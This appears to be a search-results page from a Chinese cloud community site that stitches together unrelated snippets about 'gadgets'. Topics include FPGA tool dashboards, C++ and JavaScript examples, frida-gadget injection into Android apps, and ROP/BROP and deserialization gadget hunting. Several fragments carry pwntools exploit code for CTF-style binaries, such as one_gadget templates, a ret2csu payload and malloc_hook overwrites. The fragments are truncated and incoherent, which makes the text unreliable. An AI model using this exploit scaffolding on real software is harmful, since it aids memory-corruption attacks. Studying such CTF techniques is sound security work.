newTemplates来根据传入的参数来新建一个Template,并新建一个示例,最终在底层会调用SASParser.parser函数来解析XML内容,由于底层未做XXE攻击防范从而导致XXE攻击~ Gadget
Dashboard & Gadget 在Vivado 2018.3的Project Summary窗口中,新增了dashboard按钮,其主要功能是用于显示更多细节信息,同时,可用于不同Design Runs 点击dashboard按钮后,会显示相应的界面,在此界面上方会新增一个Add Gadget按钮,如下图所示。 ? Gadget是可以配置的。 点击Add Gadget会弹出如下图所示对话框,其中Type可以是Timing、Power、Utilization、DRC或Methodology。 通过配置Gadget,可以生成不同的对比图。
代码传递思想,技术创造回响!Techo Day热忱欢迎每一位开发者的参与!
0x1:为什么要写这篇文章 看到frida-gadget持久化的话题依旧在讨论,遂想记录下自己实践过的方案,鸽了好多次的新一次发文,不当之处大手子请轻喷 ? 0x2:引言 今天咱们讨论的是frida-gadget的持久化,通俗理解也就是注入frida-gadget,让目标app加载该so文件,进而实现frida的hook功能,并且和app共生,一定程度上也免去了反调试 先来看这篇文章在【未root的设备上使用frida:https://bbs.pediy.com/thread-229970.htm】,作者主要介绍的是利用lief工具把frida-gadget链接到目标 /lib下,找到app的so然后和frida-gadget进行链接 风险点:需要过root检测,so文件完整性检测(如:目标app可扫描/data/app/packageName-xxx/lib 目录下所有文件,和文件md5上传服务器做校验) 2,(未实践)利用lief工具把frida-gadget和系统库(如libart,libc)链接到一起,实现加载和hook 风险点:需要过root
RNDIS-CO 概括 RNDIS USB Gadget 可被利用通过数据包过滤器更新机制转储内核内存空间的内容。
写在前面 简单地说,本文介绍了两种构造gadget的思路。 其意义在于它提出了在运行时寻找gadget同时构造ROP链的概念。 将当前页运行时反汇编后,获得所需要的gadget并构造ROP链。 以上步骤可以注入自己想要的gadget,接下来就是要找到gadget所在的位置。 总结 实际上本文的核心思想很简单: (1)攻击者通过构造JS代码产生一个jit-compile gadget (2)由于所产生的gadget是攻击者控制的,所以不需要搜索,不需要读页,即可被攻击者用来构造
usb_gadget_set_state(struct usb_gadget *gadget, enum usb_device_state state) { gadget->state >/include/linux/usb/gadget.h extern void usb_gadget_set_state(struct usb_gadget *gadget, enum usb_device_state * @gadget: the gadget to be added to the list. * @release: a gadget release function. . */ int usb_add_gadget_udc_release(struct device *parent, struct usb_gadget *gadget, void ( static void usb_gadget_state_work(struct work_struct *work) { struct usb_gadget *gadget = work_to_gadget
fastjson反序列化漏洞具体原理就不多说了,可以简单理解为可以设置type调用任意类,并为其设置属性值。
提取出gadget之后,它将会对这些gadget进行分析,并解析代码语义,最后根据它们的实用性来存储gadget信息。 ROPGenerator的优势 优秀的命令行接口:工具提供了一个流畅且易于使用的命令行接口; 基于语义的gadget查询:你可以通过指定语义来快速查询相关的gadget; Gadget链构建引擎:单个 gadget无法满足你的需求? ,接下来工具会对所有提取出来的gadget进行分析,并计算语义,然后将分析结果存储在一个gadget数据库中。 从源码文件加载gadget: ? 快速查询gadget: ? ? ? ? 自动化生成漏洞利用代码: ?
目前主要的 JNDI gadget 已经进了黑名单,还不允许反序列化类实现了 ClassLoader、DataSource、RowSet 接口,这就导致了绝大部分的 JNDI gadget 无法利用,所以本篇文章主要分享一下 gadget 的挖掘思路和漏洞的原理分析。 但还有三个问题,会阻碍 gadget 的触发。 以上三点足够让大部分常见的 gadget 无法使用,所以需要换一种 gadget 挖掘思路。 文件读写 我寻找 gadget 时的条件是这样的。
同时,每个Gadget的显示方式是可编辑的,只需点击如下图中的红色椭圆框住的标记。对于多个Gadget,可将其展开或折叠,以便于查看,只需点击如下图中的蓝色椭圆框住的标记。 由此可以看出,Gadget是Dashboard的构成组件。 ? Vivado 2019.1,对于新的Design Run的报告可自动添加到Gadget中,如下图所示。从而可生成相应的比较内容。 ? Gadget比较的内容其实跟Report紧密相关,而Report则跟Report Strategy紧密相关。 这样的好处在于Gadget的比较项目可以很快生成。 看两个Gadget: 不同Design Run的资源利用率: ? 同一Design Run不同阶段的时序: ?
所谓 stop_gadget 就是那些一旦执行到这个地址就会挂起而不会报错的程序 def get_stop_gadget(buf_size, start_addr=0x400000): stop_gadget 的过程就是寻找 pop rdi;ret 的过程了,这个 gadget 可以在通用 gadget 中找到,什么是通用 gadget 呢? 5f 开始解析,那么我们就可以获取到 5f c3 ,也就是 useful gadget 了 所以现在获取 useful gadget 的任务变成了获取第一块通过 gadget 的地址 通过 gadget (buf_size, stop_gadget, main_addr, start_addr=0x400000): useful_gadget = start_addr stop_gadget : 0x%x", useful_gadget) return useful_gadget 由于 main_addr 是一个 stop_gadget ,所以不会导致 EOFError 错误
Example(示例) Gadget make_gadget(int n) { // ... } void user() { Gadget g = make_gadget(17); make_gadget(17); if (! 例如: Gval make_gadget(int n) { // ... } void user() { auto r = make_gadget(17); if (! g1.valid()) { return {0, g1_error}; } Gadget g2 = make_gadget(31); if (! g1 = make_gadget(17); if (!
为了能够找到 gadget,可以分为两步: 1、stop gadget,当执行这一段代码时,程序陷入无限循环,使攻击者一直保持连接状态,其根本目的在于告诉攻击者,其所测试的地址是一段gadget 2、 = get_stop_addr(length) stop_gadget = 0x4005c0 ##brop_gadget = find_brop_gadget(length,stop_gadget) brop_gadget = 0x4007ba rdi_ret = brop_gadget + 9 ##puts_plt = get_puts_plt(length, rdi_ret, stop_gadget = get_stop_addr(length) stop_gadget = 0x4006b6 ##brop_gadget = find_brop_gadget(length,stop_gadget) brop_gadget = 0x4007ba rdi_ret = brop_gadget + 9 ##puts_plt = get_puts_addr(length, rdi_ret, stop_gadget
/download/9.1.26/frida-gadget-9.1.26-android-arm.so.xz 2017-04-11 10:48:45 (3.29 MB/s) - ‘frida-gadget -9.1.26-android-arm.so.xz $ ls frida-gadget-9.1.26-android-arm.so # copy frida gadget library in armeabi directory under lib $ cp frida_libs/armeabi/frida-gadget-9.1.26-android-arm.so out_dir/lib/armeabi/libfrida-gadget.so PID Name ----- ------ 16071 Gadget Examples! [USB::Samsung SM-G925F::Gadget]-> Java.available true [USB::Samsung SM-G925F::Gadget]-> $ frida-trace
EXP Template #coding:utf-8 import sys from pwn import * from one_gadget import generate_one_gadget # sh = process(elf_addr) elf = ELF(elf_addr) libc = ELF(libc_addr) one_ggs = one_gadget def one_gadget(libc_addr): log.progress("Leak One_Gadgets...") path_to_libc=libc_addr gadget =[] for offset in generate_one_gadget(path_to_libc): gadget.append (int(offset)) return gadget #one_gg = one_gadget("/lib/x86_64-linux-gnu/libc.so.6") def exp(
利用思路 当在x64程序中找不到rdx、rsi、edi时,再使用此方法 确定gadget1、gadget2的地址及顺序 构造初步ret2csu payload函数 ---- 例题 easy_csu 、gadget2的地址 由于程序中vul函数并未执行过,而call函数的用法是跳转到某地址内所保存的地址,但此时的vul地址内并没有真实地址,所以这里要考虑绕过call这个调用,直接通过retn跳转至vul /easy_csu") elf = ELF("easy_csu") context.log_level = "debug" offset = 40 gadget1 = 0x00000000004011FE += p64(gadget1) payload += "b"*8 payload += p64(0) payload += p64(1) payload += p64(init_array) payload += p64(3) + p64(3) + p64(3) payload += p64(gadget2) payload += 'c'*0x38 payload += p64(elf.symbols["
我们先来看一下公有成员,公有成员非常简单,我们平时声明的方法,函数都是公有的,比如: // 构造函数 var Gadget = function () { }; // 公有静态方法 Gadget.isShiny var iphone = new Gadget(); iphone.setPrice(500); console.log(typeof Gadget.setPrice); // "undefined" console.log(typeof iphone.isShiny); // "undefined" Gadget.prototype.isShiny = Gadget.isShiny; console.log 1 var g2 = new Gadget(); // logs 2 var g3 = new Gadget(); // logs 3 复制代码 可以看出,虽然每次都是new的对象,但数字依然是递增的 (); iphone.getLastId(); // 1 var ipod = new Gadget(); ipod.getLastId(); // 2 var ipad = new Gadget();
这样当我们再次使用malloc申请chunk时,便能触发malloc_hook上的one_gadget而不会导致程序异常退出了。 泄露libc后通过计算得出malloc_hook、_IO_wide_data_0、one_gadget等地址 ? EXP #coding:utf-8 from pwn import * from one_gadget import generate_one_gadget context.terminal = [" (libc_addr): path_to_libc=libc_addr gadget =[] for offset in generate_one_gadget(path_to_libc ): gadget.append(int(offset)) return gadget ### 利用unsorted_bin的特性当申请超过0x80的chunk时,将泄露main_arena
libc_addr # - enable_Onegadgets # - exp() import os import sys from pwn import * from one_gadget import generate_one_gadget # context.terminal = ["tmux","splitw","-h"] context.terminal = ["tmux"," def one_gadget(libc_addr): log.progress("Leak One_Gadgets...") path_to_libc=libc_addr gadget =[] for offset in generate_one_gadget(path_to_libc): gadget.append (int(offset)) return gadget #one_gg = one_gadget("/lib/x86_64-linux-gnu/libc.so.6") def exp()
校园优惠套餐升级,云服务器1核2G10元/月起购
扫码关注云+社区
领取腾讯云代金券
云服务器
测试服务 WeTest
文件存储
命令行工具
SSL 证书
